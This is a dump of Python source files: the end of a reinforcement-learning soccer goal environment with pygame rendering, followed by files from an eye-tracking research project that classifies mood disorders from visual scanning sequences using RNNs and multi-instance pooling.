elif self.goalie.can_catch(self.ball) or not self.ball.in_field():
end_episode = True
reward = -self.ball.goal_distance()
else:
end_episode = False
reward = 0
if end_episode:
self.states.append([
self.player.position.copy(),
self.player.orientation,
self.goalie.position.copy(),
self.goalie.orientation,
self.ball.position.copy()])
return reward, end_episode
def _is_stable(self):
""" Determines whether objects have stopped moving. """
speeds = [norm(entity.velocity) for entity in self.entities]
return max(speeds) < 0.1
@staticmethod
def scale_state(state):
""" Scale state variables between 0 and 1. """
scaled_state = (state + SHIFT_VECTOR) / SCALE_VECTOR
return scaled_state
@staticmethod
def unscale_state(scaled_state):
""" Unscale state variables. """
state = (scaled_state * SCALE_VECTOR) - SHIFT_VECTOR
return state
def __draw_internal_state(self, internal_state, fade=False):
""" Draw the field and players. """
player_position = internal_state[0]
player_orientation = internal_state[1]
goalie_position = internal_state[2]
goalie_orientation = internal_state[3]
ball_position = internal_state[4]
ball_size = BALL_CONFIG['SIZE']
self.window.blit(self.__background, (0, 0))
# Draw goal and penalty areas
length = self.__visualiser_scale(PITCH_LENGTH / 2)
width = self.__visualiser_scale(PITCH_WIDTH)
self.__draw_vertical(length, 0, width)
self.__draw_box(GOAL_AREA_WIDTH, GOAL_AREA_LENGTH)
# self.draw_box(PENALTY_AREA_WIDTH, PENALTY_AREA_LENGTH)
depth = length + self.__visualiser_scale(GOAL_DEPTH)
self.__draw_horizontal(width / 2 - self.__visualiser_scale(GOAL_WIDTH / 2), length, depth)
self.__draw_horizontal(width / 2 + self.__visualiser_scale(GOAL_WIDTH / 2), length, depth)
# self.draw_radius(vector(0, 0), CENTRE_CIRCLE_RADIUS)
# Draw Players
self.__draw_player(player_position, player_orientation, self.__white)
if not fade:
self.__draw_radius(player_position, KICKABLE)
self.__draw_player(goalie_position, goalie_orientation, self.__red)
if not fade:
self.__draw_radius(goalie_position, CATCHABLE)
# Draw ball
self.__draw_entity(ball_position, ball_size, self.__black)
pygame.display.update()
def __visualiser_scale(self, value):
''' Scale up a value. '''
return int(self._VISUALISER_SCALE_FACTOR * value)
def __upscale(self, position):
''' Maps a simulator position to a field position. '''
pos1 = self.__visualiser_scale(position[0])
pos2 = self.__visualiser_scale(position[1] + PITCH_WIDTH / 2)
return np.array([pos1, pos2])
def __draw_box(self, area_width, area_length):
""" Draw a box at the goal line. """
lower_corner = self.__visualiser_scale(PITCH_WIDTH / 2 - area_width / 2)
upper_corner = lower_corner + self.__visualiser_scale(area_width)
line = self.__visualiser_scale(PITCH_LENGTH / 2 - area_length)
self.__draw_vertical(line, lower_corner, upper_corner)
self.__draw_horizontal(lower_corner, line, self.__visualiser_scale(PITCH_LENGTH / 2))
self.__draw_horizontal(upper_corner, line, self.__visualiser_scale(PITCH_LENGTH / 2))
def __draw_player(self, position, orientation, colour):
''' Draw a player with given position and orientation. '''
size = PLAYER_CONFIG['SIZE']
self.__draw_entity(position, size, colour)
radius_end = size * angle_position(orientation)
pos = vector_to_tuple(self.__upscale(position))
end = vector_to_tuple(self.__upscale(position + radius_end))
pygame.draw.line(self.window, self.__black, pos, end)
def __draw_radius(self, position, radius):
""" Draw an empty circle. """
pos = vector_to_tuple(self.__upscale(position))
radius = self.__visualiser_scale(radius)
pygame.draw.circle(self.window, self.__white, pos, radius, 1)
def __draw_entity(self, position, size, colour):
""" Draws an entity as a ball. """
pos = vector_to_tuple(self.__upscale(position))
radius = self.__visualiser_scale(size)
pygame.draw.circle(self.window, colour, pos, radius)
def __draw_horizontal(self, yline, xline1, xline2):
""" Draw a horizontal line. """
pos1 = (xline1, yline)
pos2 = (xline2, yline)
pygame.draw.line(self.window, self.__white, pos1, pos2)
def __draw_vertical(self, xline, yline1, yline2):
""" Draw a vertical line. """
pos1 = (xline, yline1)
pos2 = (xline, yline2)
pygame.draw.line(self.window, self.__white, pos1, pos2)
def __draw_render_states(self):
"""
Draw the internal states from the last action.
"""
length = len(self.render_states)
for i in range(0, length):
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.display.quit()
pygame.quit()
sys.exit()
self.__draw_internal_state(self.render_states[i])
self.__clock.tick(self._VISUALISER_DELAY)
self.render_states = [] # clear states for next render
def render(self, mode='human', close=False):
if close:
pygame.display.quit()
pygame.quit()
self.window = None
return
self._initialse_window()
self.__draw_render_states()
#img = self._get_image()
#if mode == 'rgb_array':
# return img
# elif mode == 'human':
# from gym.envs.classic_control import rendering
# if self.viewer is None:
# self.viewer = rendering.SimpleImageViewer(SCREEN_WIDTH, SCREEN_HEIGHT)
# self.viewer.imshow(img)
def _initialse_window(self):
# initialise visualiser
if self.window is None:
pygame.init()
width = self.__visualiser_scale(PITCH_LENGTH / 2 + GOAL_DEPTH)
height = self.__visualiser_scale(PITCH_WIDTH)
self.window = pygame.display.set_mode((width, height))
self.__clock = pygame.time.Clock()
size = (width, height)
self.__background = pygame.Surface(size)
self.__white = pygame.Color(255, 255, 255, 0)
self.__black = pygame.Color(0, 0, 0, 0)
self.__red = pygame.Color(255, 0, 0, 0)
self.__background.fill(pygame.Color(0, 125, 0, 0))
def save_render_states(self, dir, prefix, index=0):
self._initialse_window()
import os
for s in self.render_states:
self.__draw_internal_state(s)
pygame.image.save(self.window, os.path.join(dir, prefix+"_"+str("{:04d}".format(index))+".jpeg"))
index += 1
return index
class Entity:
""" This is a base entity class, representing moving objects. """
def __init__(self, config):
self.rand = config['RAND']
self.accel_max = config['ACCEL_MAX']
self.speed_max = config['SPEED_MAX']
self.power_rate = config['POWER_RATE']
self.decay = config['DECAY']
self.size = config['SIZE']
self.position = np.array([0., 0.])
self.velocity = np.array([0., 0.])
self.np_random = None # overwritten by seed()
def update(self):
""" Update the position and velocity. """
self.position += self.velocity
self.velocity *= self.decay
def accelerate(self, power, theta):
""" Applies a power to the entity in direction theta. """
rrand = self.np_random.uniform(-self.rand, self.rand)
theta = (1 + rrand) * theta
rmax = self.rand * norm(self.velocity)
noise = self.np_random.uniform(-rmax, rmax, size=2)
rate = float(power) * self.power_rate
acceleration = rate * angle_position(theta) + noise
acceleration = bound_vector(acceleration, self.accel_max)
self.velocity += acceleration
self.velocity = bound_vector(self.velocity, self.speed_max)
def decollide(self, other):
""" Shift overlapping entities apart. """
overlap = (self.size + other.size - self.distance(other)) / 2
theta1 = angle_between(self.position, other.position)
theta2 = angle_between(other.position, self.position)
self.position += overlap * angle_position(theta2)
other.position += overlap * angle_position(theta1)
self.velocity *= -1
other.velocity *= -1
def colliding(self, other):
""" Check if two entities are overlapping. """
dist = self.distance(other)
return dist < self.size + other.size
def distance(self, other):
""" Computes the euclidean distance to another entity. """
return norm(self.position - other.position)
def in_area(self, left, right, bot, top):
""" Checks if the entity is in the area. """
xval, yval = self.position
in_length = left <= xval <= right
in_width = bot <= yval <= top
return in_length and in_width
class Player(Entity):
""" This represents a player with a position,
velocity and an orientation. """
def __init__(self, position, orientation):
""" The values for this class are defined by the player constants. """
Entity.__init__(self, PLAYER_CONFIG)
self.position = position
self.orientation = orientation
def homothetic_centre(self, ball):
""" Computes the homothetic centre between the player and the ball. """
ratio = 1. / (self.size + ball.size)
position = (ball.position * self.size + self.position * ball.size)
return ratio * position
def tangent_points(self, htc):
""" Finds the tangent points on the player wrt to homothetic centre. """
diff = htc - self.position
square = sum(diff ** 2)
if square <= self.size ** 2:
delta = 0.0
else:
delta = np.sqrt(square - self.size ** 2)
xt1 = (diff[0] * self.size ** 2 + self.size * diff[1] * delta) / square
xt2 = (diff[0] * self.size ** 2 - self.size * diff[1] * delta) / square
yt1 = (diff[1] * self.size ** 2 + self.size * diff[0] * delta) / square
yt2 = (diff[1] * self.size ** 2 - self.size * diff[0] * delta) / square
tangent1 = np.array((xt1, yt1)) + self.position
tangent2 = np.array((xt1, yt2)) + self.position
tangent3 = np.array((xt2, yt1)) + self.position
tangent4 = np.array((xt2, yt2)) + self.position
if norm(tangent1 - self.position) == self.size:
return tangent1, tangent4
else:
return tangent2, tangent3
def ball_angles(self, ball, angle):
""" Determines which angle to kick the ball along. """
htc = self.homothetic_centre(ball)
tangent1, tangent2 = self.tangent_points(htc)
target = self.position + self.size * angle_position(angle)
if norm(tangent1 - target) < norm(tangent2 - target):
return angle_between(htc, tangent1)
else:
return angle_between(htc, tangent2)
def kick_power(self, ball):
""" Determines the kick power weighting given ball position. """
angle = angle_between(self.position, ball.position)
dir_diff = abs(angle_difference(angle, self.orientation))
dist = self.distance(ball)
return 1 - 0.25 * dir_diff / np.pi - 0.25 * dist / KICKABLE
def facing_ball(self, ball):
""" Determines whether the player is facing the ball. """
angle = angle_between(self.position, ball.position)
return self.facing_angle(angle)
def facing_angle(self, angle):
""" Determines whether the player is facing an angle. """
return angle_close(self.orientation, angle)
def turn(self, angle):
""" Turns the player. """
moment = norm_angle(angle)
speed = norm(self.velocity)
angle = moment / (1 + INERTIA_MOMENT * speed)
self.orientation = self.orientation + angle
def dash(self, power):
""" Dash forward. """
power = bound(power, MINPOWER, MAXPOWER)
self.accelerate(power, self.orientation)
def can_kick(self, ball):
""" Determines whether the player can kick the ball. """
return self.distance(ball) <= KICKABLE
def kick_ball(self, ball, power, direction):
""" Kicks the ball. """
if self.can_kick(ball):
power = bound(power, MINPOWER, MAXPOWER)
power *= self.kick_power(ball)
ball.accelerate(power, self.orientation + direction)
def kick_towards(self, ball, power, direction):
""" Kick the ball directly to a direction. """
self.kick_ball(ball, power, direction - self.orientation)
def shoot_goal(self, ball, ypos):
""" Shoot the goal at a targeted position on the goal line. """
ypos = bound(ypos, -GOAL_WIDTH / 2, GOAL_WIDTH / 2)
target = np.array((PITCH_LENGTH / 2 + ball.size, ypos))
self.kick_to(ball, target)
def face_ball(self, ball):
""" Turn the player towards the ball. """
theta = angle_between(self.position, ball.position)
self.face_angle(theta)
def face_angle(self, angle):
""" Turn the player towards and angle. """
self.turn(angle - self.orientation)
def to_ball(self, ball):
""" Move towards the ball. """
if not self.facing_ball(ball):
self.face_ball(ball)
elif not self.can_kick(ball):
self.dash(10)
def kick_to(self, ball, target):
""" Kick the ball to a target position. """
if not self.can_kick(ball):
self.to_ball(ball)
else:
accel = (1 - ball.decay) * (target - self.position) - ball.velocity
power = norm(accel) / (self.kick_power(ball) * ball.power_rate)
theta = np.arctan2(accel[1], accel[0])
self.kick_towards(ball, power, theta)
def turn_ball(self, ball, angle):
""" Turn the ball around the player. """
if not self.can_kick(ball):
self.to_ball(ball)
elif not self.facing_angle(angle):
self.face_angle(angle)
elif self.size < self.distance(ball):
theta = self.ball_angles(ball, angle)
power = 0.1 / self.kick_power(ball)
self.kick_towards(ball, power, theta)
def dribble(self, ball, target):
""" Dribble the ball to a position. """
angle = angle_between(self.position, ball.position)
theta = angle_between(self.position, target)
if not self.can_kick(ball):
self.to_ball(ball)
elif ball.close_to(target):
pass
elif not angle_close(angle, theta):
self.turn_ball(ball, theta)
elif not self.facing_angle(theta):
self.face_angle(theta)
elif self.distance(ball) < (KICKABLE + self.size + ball.size) / 2:
self.kick_towards(ball, 1.5, theta)
else:
self.dash(10)
class Goalie(Player):
""" This class defines a special goalie player. """
def move(self, ball, player):
""" This moves the goalie. """
ball_end = ball.position + ball.velocity / (1 - ball.decay)
diff = ball_end - ball.position
grad = diff[1] / diff[0] if diff[0] != 0. else 0 # avoid division by 0
yint = ball.position[1] - grad * ball.position[0]
goal_y = grad * PITCH_LENGTH / 2 + yint
if ball_end[0] > PITCH_LENGTH / 2 and -GOAL_WIDTH / 2 - CATCHABLE <= goal_y <= GOAL_WIDTH / 2 + CATCHABLE \
and grad != 0:
grad2 = -1 / grad
yint2 = self.position[1] - grad2 * self.position[0]
ballx = (yint2 - yint) / (grad - grad2)
bally = grad * ballx + yint
target = np.array((ballx, bally))
self.move_towards(20, target)
self.orientation = angle_between(self.position, target)
else:
self.orientation = angle_between(self.position, ball_end)
self.move_towards(8, ball_end)
def move_towards(self, power, target):
""" Move towards target position. """
theta = angle_between(self.position, target)
self.accelerate(power, theta)
def can_catch(self, ball):
""" Determines whether the goalie can catch the ball. """
can_catch = self.distance(ball) < CATCHABLE
return self.np_random.random_sample() <= CATCH_PROBABILITY and can_catch
class Ball(Entity):
""" This class represents the ball, which has no orientation. """
def __init__(self, position):
""" The values for this class are defined by the ball constants. """
Entity.__init__(self, BALL_CONFIG)
self.position = position
def close_to(self, position):
""" Determines whether the ball is close to a postion. """
return norm(self.position - position) <= 1.5
def goal_distance(self):
""" Returns the distance from the goal box. """
if self.position[0] < PITCH_LENGTH / 2:
if self.position[1] < -GOAL_WIDTH / 2:
bot_corner = np.array((PITCH_LENGTH / 2, -GOAL_WIDTH / 2))
return norm(self.position - bot_corner)
elif self.position[1] > GOAL_WIDTH / 2:
top_corner = np.array((PITCH_LENGTH / 2, GOAL_WIDTH / 2))
return norm(self.position - top_corner)
else:
return PITCH_LENGTH / 2 - self.position[0]
else:
if self.position[1] < -GOAL_WIDTH / 2:
return GOAL_WIDTH / 2 - self.position[1]
elif self.position[1] > GOAL_WIDTH / 2:
return self.position[1] - GOAL_WIDTH / 2
else:
return 0
def in_field(self):
""" Checks if the ball has left the field. """
return self.in_area(0, PITCH_LENGTH / 2, -PITCH_WIDTH / 2, PITCH_WIDTH / 2)
def in_net(self):
""" Checks if the ball is in the net. """
return self.in_area(PITCH_LENGTH / 2, PITCH_LENGTH / 2 + GOAL_DEPTH, -GOAL_WIDTH / 2, GOAL_WIDTH / 2)
def in_goalbox(self):
""" Checks if the ball is in the goal box. """
return self.in_area(PITCH_LENGTH / 2 - GOAL_AREA_LENGTH, PITCH_LENGTH / 2, -GOAL_AREA_WIDTH / 2,
GOAL_AREA_WIDTH / 2)
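# --- Usage sketch (added for illustration; not part of the original module) ---
# A minimal interaction loop, assuming the package-level config/util imports above resolve
# and pygame is installed. The action layout follows ACTION_LOOKUP: a discrete index plus
# one parameter array per action.
if __name__ == "__main__":
    env = GoalEnv()
    env.seed(0)
    state, _ = env.reset()
    # action 0 = KICK_TO with a 2-D target point; actions 1/2 = SHOOT_GOAL with a goal-line y
    params = (np.array([PITCH_LENGTH / 2 - 5.0, 0.0]),
              np.array([0.0]),
              np.array([0.0]))
    (state, steps), reward, done, info = env.step((0, params))
    if not done:
        (state, steps), reward, done, info = env.step((1, params))
    print("reward:", reward, "terminal:", done)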
``` |
{
"source": "jonomon/VSMood",
"score": 2
} |
#### File: jonomon/VSMood/main_AAAI.py
```python
import numpy as np
import pandas as pd
import random
import logging
import argparse
import os
import matplotlib.pyplot as plt
random.seed(1114)
np.random.seed(129)
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_auc_score, accuracy_score, log_loss
from sklearn.metrics import balanced_accuracy_score
from vsbrnn.run_vsb_sequence import run_vsb_sequence
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
## For basic usage check: python main_AAAI.py -h
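## Example invocation (argument values are illustrative only):
##   python main_AAAI.py glance 16 mean --region_model_type grid9 --max_len 30 --verbose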
def main():
data_type_options = ["fix", "glance", "fix-sequence"]
multi_instance_options = ['mean', '2d-mean', 'max-likelihood', 'similar', 'log-prob']
cnn_layers_options = ['1', '2', 'none']
region_model_type_options = ["semantic5", "grid9", "semantic8", "grid16"]
use_vsb_options = ['scan_path', 'glance_dur']
use_img_options = ['img_type', 'img_pos']
logging.basicConfig(filename='log.txt', level=logging.DEBUG, filemode="w")
parser = argparse.ArgumentParser(description='Run RNN for bipolar.')
parser.add_argument('data_type', type=str, help='options: {}'.format(data_type_options))
parser.add_argument('states', type=int, help='states')
parser.add_argument('multi_instance', type=str,
help='Multi instance options {}'.format(multi_instance_options))
parser.add_argument('--region_model_type', type=str,
help='region model types {} default region_clinical'.format(
region_model_type_options))
parser.add_argument('--cnn_layers', type=str,
help='cnn options {}'.format(cnn_layers_options))
parser.add_argument('--max_len', type=int, help='max length of sequence')
parser.add_argument('--use_vsb', type=str, nargs="+",
help='VSB features only with glance data_type, options: {}'.format(
use_vsb_options))
parser.add_argument('--use_img', type=str, nargs="+",
help='should use image properties, options: {}'.format(use_img_options))
parser.add_argument('--verbose', dest='verbose', action='store_true')
parser.add_argument('--print_sub', dest='print_sub', action='store_true')
parser.add_argument('--plot', dest='plot', action='store_true')
args = parser.parse_args()
data_type = args.data_type
states = args.states
max_len = args.max_len
use_vsb = args.use_vsb
use_img = args.use_img
region_model_type = args.region_model_type
cnn_layers = args.cnn_layers
multi_instance = args.multi_instance
verbose = args.verbose
print_sub = args.print_sub
plot = args.plot
logging.debug("Running %s with states=%s, mi=%s, max_length=%s, use_vsb=%s, use_img=%s",
data_type, states, multi_instance, max_len, use_vsb, use_img)
print("Running {} with states={}, mi={}, max_length={}, use_vsb={}, use_img={} region_model={} cnn_layers={}".format(data_type, states, multi_instance, max_len, use_vsb, use_img,
region_model_type, cnn_layers))
if data_type not in data_type_options:
print("{} not an available data_type option".format(data_type))
return
if data_type == "fix" and use_vsb:
print("VSB parameters are not available when in fixation")
return
if multi_instance not in multi_instance_options:
print("{} not available option for multi_instance".format(multi_instance))
return
if region_model_type != None and region_model_type not in region_model_type_options:
print("{} not available option for region_model_type".format(region_model_type))
return
if cnn_layers != None and cnn_layers not in cnn_layers_options:
print("{} not available option for cnn_layers".format(cnn_layers))
return
sub_cat, sub_prob = run_vsb_sequence(data_type, states, max_len,
use_vsb, use_img, region_model_type,
cnn_layers, multi_instance,
verbose=verbose, print_sub=print_sub)
sub_prob = np.array(sub_prob)
df = pd.DataFrame({"cat": sub_cat, "prob": sub_prob})
df.to_csv("output/{}-{}-{}-{}.csv".format(data_type, states, region_model_type, cnn_layers))
clf = LogisticRegression(class_weight="balanced")
clf.fit(sub_prob.reshape(-1, 1), sub_cat)
y_predicted = clf.predict(sub_prob.reshape(-1, 1))
auc_val = roc_auc_score(sub_cat, sub_prob)
acc_val = accuracy_score(sub_cat, y_predicted)
b_acc_val = balanced_accuracy_score(sub_cat, y_predicted)
log_loss_val = log_loss(sub_cat, sub_prob)
print("Avg auc={} acc_val={} b_acc_val={} log_loss_val={}\n\n".format(
auc_val, acc_val, b_acc_val, log_loss_val))
if plot:
from sklearn.metrics import roc_curve, auc
plt.clf()
fpr, tpr, _ = roc_curve(sub_cat, sub_prob, pos_label=1)
auc_val = auc(fpr, tpr)
plt.plot(fpr, tpr, color='#FF69B4',
label='ROC curve (area = {})'.format(round(auc_val, 2)))
plt.plot([0, 1], [0, 1], color='navy', lw=1, linestyle='--')
plt.xlabel('False Positive Rate')
plt.ylabel('True Positive Rate')
plt.legend(loc="lower right")
filename = "img/{} with states={}, mi={}".format(data_type, states, multi_instance)
plt.savefig(filename + ".png")
pd.DataFrame([sub_cat, sub_prob]).T.to_csv(filename + ".csv")
if __name__ == "__main__":
main()
```
#### File: vsbrnn/data/data_importer.py
```python
import pandas as pd
import numpy as np
import csv
from data import FixationsList
from vsbrnn.utils import get_max_sequence_len, tokenise_sequence, tokenise_cat, tokenise_img_type
from keras.preprocessing.sequence import pad_sequences
imid_position_TGH = {1: (144, 41), 2: (834, 41), 3: (144, 583), 4: (834, 583)}
imid_position_TWH = {1: (460, 80), 2: (1150, 80), 3: (460, 590), 4: (1150, 590)}
imid_position = {"ED Week 2_TGH": imid_position_TGH, "ED Week 2_TWH": imid_position_TWH}
imid_size = {"ED Week 2_TGH": (302, 400), "ED Week 2_TWH": (310, 410)}
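# Top-left pixel offsets and (width, height) of each stimulus image per test site, used
# below to normalise raw fixation coordinates into [0, 1] relative to the image.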
class DataImporter:
def __init__(self):
self.file_data = pd.read_csv("vsbrnn/data/vsb_data.csv",
delimiter="\t", quoting=csv.QUOTE_NONE)
self.vsbs = ["glance_dur", "no_fix", "scan_path"]
def _preprocess_data(self, cat_data, subject_data, sequence_data, img_label_data,
max_len, model):
subject_data = np.array(subject_data)
cat_data = np.array(cat_data)
img_label_data["img_type"] = tokenise_img_type(img_label_data["img_type"])
seq = tokenise_sequence(np.array(sequence_data), model)
max_len = get_max_sequence_len(sequence_data) if max_len == None else max_len
seq = pad_sequences(seq, maxlen=max_len)
output = [subject_data, cat_data, seq]
cols = ["Subject", "Cat", "Sequence"]
for i in img_label_data:
img_label = pad_sequences(img_label_data[i], maxlen=max_len)
output.append(img_label)
cols.append(i)
data = pd.DataFrame(output).T
data.columns = cols
return data
def get_vsb_sequence_data(self, max_len, model):
cat_data = []
sequence_data = []
img_label_data = {}
for i in ["img_type", "img_pos"]:
img_label_data[i] = []
vsb_data = {}
for i in self.vsbs:
vsb_data[i] = []
subject_data = []
for (subject, slide_no, test, cat, slides) in self._iterate_file_data(self.file_data):
vsbs, sequence, img_labels = self._parse_slide_to_vsb_sequence(test, slides, model)
for k, v in vsbs.iteritems():
vsb_data[k].append(v)
sequence_data.append(sequence)
cat_data.append(cat)
subject_data.append(subject)
for k, v in img_labels.iteritems():
img_label_data[k].append(v)
vsb_output = []
vsb_cols = []
for i in vsb_data:
vsb_data[i] = pad_sequences(vsb_data[i], maxlen=max_len, dtype="float")
vsb_output.append(vsb_data[i])
vsb_cols.append(i)
vsb_df = pd.DataFrame([np.array(subject_data)] + vsb_output).T
vsb_df.columns = ["Subject1"] + vsb_cols
output_data = self._preprocess_data(
cat_data, subject_data, sequence_data, img_label_data, max_len, model)
data = pd.concat([output_data, vsb_df], axis=1)
data["Subject1"] = None
return data
def get_fix_sequence_data(self, max_len):
cat_data = []
sequence_data = []
subject_data = []
img_data = []
for (subject, slide_no, test, cat, slides) in self._iterate_file_data(self.file_data):
sequence = self._parse_slide_to_fix_sequence(slides)
saliency_image = self._parse_slide_to_saliency_img(slides)
sequence_data.append(np.stack(sequence))
img_data.append(saliency_image)
cat_data.append(cat)
subject_data.append(subject)
subject_data = np.array(subject_data)
cat_data = np.array(cat_data)
padded_sequence = pad_sequences(sequence_data, maxlen=max_len, dtype="float32")
output = [subject_data, cat_data, padded_sequence, img_data]
data = pd.DataFrame(output).T
data.columns = ["Subject", "Cat", "Sequence", "Saliency"]
return data
def get_sequence_data(self, max_len, model):
cat_data = []
sequence_data = []
subject_data = []
img_label_data = {}
for i in ["img_type", "img_pos"]:
img_label_data[i] = []
for (subject, slide_no, test, cat, slides) in self._iterate_file_data(self.file_data):
sequence, img_labels = self._parse_slide_to_sequence(test, slides, model)
sequence_data.append(sequence)
cat_data.append(cat)
subject_data.append(subject)
for k, v in img_labels.iteritems():
img_label_data[k].append(v)
output_data = self._preprocess_data(
cat_data, subject_data, sequence_data, img_label_data, max_len, model)
return output_data
def _parse_slide_to_fix_sequence(self, slides):
slides.sort()
sequence = slides.convert_fixations_to_fix_sequence()
return sequence
def _parse_slide_to_saliency_img(self, slides):
saliency_map = slides.convert_fixations_to_saliency_map()
return saliency_map
def _parse_slide_to_sequence(self, test, slides, model):
slides.sort()
sequence, img_labels = slides.convert_fixations_to_sequence(test, model)
return sequence, img_labels
def _parse_slide_to_vsb_sequence(self, test, slides, model):
slides.sort()
vsbs, glance_label, img_labels = slides.convert_fixations_to_sequence_with_vsbs(
test, model, self.vsbs)
return vsbs, glance_label, img_labels
def _iterate_file_data(self, file_data):
subject_data = {}
subject_to_cat = {}
subject_to_test = {}
for row in file_data.iterrows():
abs_fix_x_pos = self._split_by_comma(row[1]["VASTNormalisedFixationX"])
abs_fix_y_pos = self._split_by_comma(row[1]["VASTNormalisedFixationY"])
fix_dur = self._split_by_comma(row[1]["FixationDurations_ms"])
fix_start = self._split_by_comma(row[1]["FixationStart"])
img_type = row[1]["imgType(s)"]
img_pos = row[1]["ImId"]
cat = row[1]["cat"]
subject = row[1]["Subject"]
slide_num = row[1]["SlideNumCalculator"]
test = row[1]["Test"]
i_size = imid_size[test]
i_pos = imid_position[test][img_pos]
fix_x_pos = [(a - i_pos[0]) / i_size[0] for a in abs_fix_x_pos]
fix_y_pos = [(a - i_pos[1]) / i_size[1] for a in abs_fix_y_pos]
fix_list = FixationsList.from_pos(
fix_x_pos, fix_y_pos, fix_start, fix_dur, img_type, img_pos)
if subject not in subject_data:
subject_data[subject] = {}
if subject not in subject_to_cat:
subject_to_cat[subject] = cat
if subject not in subject_to_test:
subject_to_test[subject] = test
if slide_num not in subject_data[subject]:
subject_data[subject][slide_num] = fix_list
else:
subject_data[subject][slide_num] = subject_data[subject][slide_num] + fix_list
for subject_i in subject_data:
for slide in subject_data[subject_i]:
cat = subject_to_cat[subject_i]
test = subject_to_test[subject_i]
yield subject_i, slide, test, cat, subject_data[subject_i][slide]
def _split_by_comma(self, comma_string):
output = []
array = comma_string.split(",")
for i in array:
i_o = i.replace("\"", "")
if self.is_float(i_o):
output.append(float(i_o))
return output
def is_float(self, s):
try:
float(s)
return True
except ValueError:
return False
```
#### File: vsbrnn/data/data.py
```python
import numpy as np
from vsbrnn.utils import makeGaussian
import matplotlib.pyplot as plt
class Fixation:
def __init__(self, x, y, start, dur, img_type, img_pos):
self.x = x
self.y = y
self.start = start
self.dur = dur
self.img_type = img_type
self.img_pos = img_pos
def __repr__(self):
return "fix @({x}, {y}),t={start}, d={dur}".format(
x=self.x, y=self.y, start=self.start, dur=self.dur)
def __str__(self):
return "fix @({x}, {y}),t={start}, d={dur}".format(
x=self.x, y=self.y, start=self.start, dur=self.dur)
class FixationsList:
def __init__(self, fix_list):
self.fixations = fix_list
@classmethod
def from_pos(cls, x_pos, y_pos, start, dur, img_type, img_pos):
fixations = []
for x, y, s, d in zip(x_pos, y_pos, start, dur):
fix = Fixation(x, y, s, d, img_type, img_pos)
fixations.append(fix)
return cls(fixations)
def __getitem__(self, i):
return self.fixations[0]
def __repr__(self):
return str(self.fixations)
def __add__(self, b):
fixations = self.fixations + b.fixations
return FixationsList(fixations)
def sort(self):
self.fixations = sorted(self.fixations, key=lambda x: x.start)
def convert_fixations_to_saliency_map(self, size=(40, 40)):
saliency_map = np.zeros(size)
for fix in self.fixations:
x = int(fix.x * (size[0] - 1))
y = int(fix.y * (size[1] - 1))
gaussian = makeGaussian(size=size, centre=(x, y), fwhm=5)
# if (x < size[0] and x > 0) and (y < size[1] and y > 0):
#saliency_map[y, x] += 1
saliency_map += gaussian
# saliency_map[saliency_map<1] = 0
return saliency_map
def convert_fixations_to_fix_sequence(self, size=(40, 40)):
sequence = []
for fix in self.fixations:
x = int(fix.x * (size[0] - 1))
y = int(fix.y * (size[1] - 1))
gaussian = makeGaussian(size=size, centre=(x, y), fwhm=5)
sequence.append(gaussian)
return sequence
def convert_fixations_to_sequence(self, test, region_model):
sequence = []
img_labels = {}
for i in ["img_pos", "img_type"]:
img_labels[i] = []
for fix in self.fixations:
if region_model.ignore_fixations_outside:
if (fix.x < 0.0 or fix.x > 1.0) or (fix.y < 0.0 or fix.y > 1.0):
continue
label = region_model.fix_in_region(test, fix)
sequence.append(label)
img_labels["img_type"].append(fix.img_type)
img_labels["img_pos"].append(fix.img_pos)
return sequence, img_labels
def convert_fixations_to_sequence_with_vsbs(self, test, region_model, vsb_selected):
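# Groups consecutive fixations into 'glances': a new glance starts when both the region
# label and the image being looked at change. For each glance, the selected visual
# scanning behaviour (VSB) features are computed (glance duration, scan-path length,
# number of fixations).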
sequence, _ = self.convert_fixations_to_sequence(test, region_model)
prev_label = sequence[0]
prev_fix = self.fixations[0]
fixes = [self.fixations[0]]
fix_ordered = []
glance_label = [sequence[0]]
img_labels = {}
for i in ["img_pos", "img_type"]:
img_labels[i] = []
for fix, label in zip(self.fixations[1:], sequence[1:]):
if prev_label != label and prev_fix.img_pos != fix.img_pos:
fix_ordered.append(fixes)
glance_label.append(label)
img_labels["img_pos"].append(prev_fix.img_pos)
img_labels["img_type"].append(prev_fix.img_type)
fixes = []
prev_label = label
prev_fix = fix
fixes.append(fix)
fix_ordered.append(fixes)
img_labels["img_pos"].append(prev_fix.img_pos)
img_labels["img_type"].append(prev_fix.img_type)
vsbs = {}
for i in vsb_selected:
vsbs[i] = []
for fixes in fix_ordered:
glance_duration = self._get_glance_duration(fixes)
length_scanpath = self._get_length_scanpath(fixes)
no_fix = self._get_no_fixations(fixes)
if "glance_dur" in vsb_selected:
vsbs["glance_dur"].append(glance_duration)
if "no_fix" in vsb_selected:
vsbs["no_fix"].append(no_fix)
if "scan_path" in vsb_selected:
vsbs["scan_path"].append(length_scanpath)
return vsbs, glance_label, img_labels
def _get_glance_duration(self, fixes):
return sum([a.dur for a in fixes])/1000
def _get_length_scanpath(self, fixes):
scan_path = 0
prev_coord = (fixes[0].x, fixes[0].y)
for fix in fixes[1:]:
coord = (fix.x, fix.y)
scan_path += np.sqrt((coord[0] - prev_coord[0])**2 + (coord[1] - prev_coord[1])**2)
prev_coord = coord
return scan_path
def _get_no_fixations(self, fixes):
return len(fixes)
```
#### File: VSMood/vsbrnn/multi_instance.py
```python
import matplotlib.pyplot as plt
import numpy as np
from vsbrnn.utils import get_log_likelihood
class MultiInstance():
def __init__(self, method, X_train, y_train, x_test, trainer):
self.method = method
self.X_train = X_train
self.y_train = y_train
self.x_test = x_test
self.trainer = trainer
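# get_pred() pools the per-sequence (per-slide) probabilities in `preds` into a single
# subject-level score, using the pooling strategy named by `method`.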
def get_pred(self, preds):
if self.method == "mean":
return self.get_mean_pred(preds)
elif self.method == "1std-mean":
return self.get_n_std_mean_pred(1, preds)
elif self.method == "max-likelihood":
return self.get_max_likelihood(preds)
elif self.method == "similar":
return self.get_similar(preds)
elif self.method == "log-prob":
return self.get_log_prob(preds)
else:
return None
def get_mean_pred(self, preds):
return np.mean(preds)
def get_n_std_mean_pred(self, n, preds):
std = np.std(preds)
mean = np.mean(preds)
max_value = mean + n * std
min_value = mean - n * std
mean_preds = preds[np.logical_and(preds > min_value, preds < max_value)]
return np.mean(mean_preds)
def get_max_likelihood(self, preds):
X_predicts = self.trainer.predict(self.X_train)
n_d, bins_d, _ = plt.hist(
X_predicts[self.y_train[:, 1]==1], facecolor='green', alpha=0.5)
n_bd, bins_bd, _ = plt.hist(
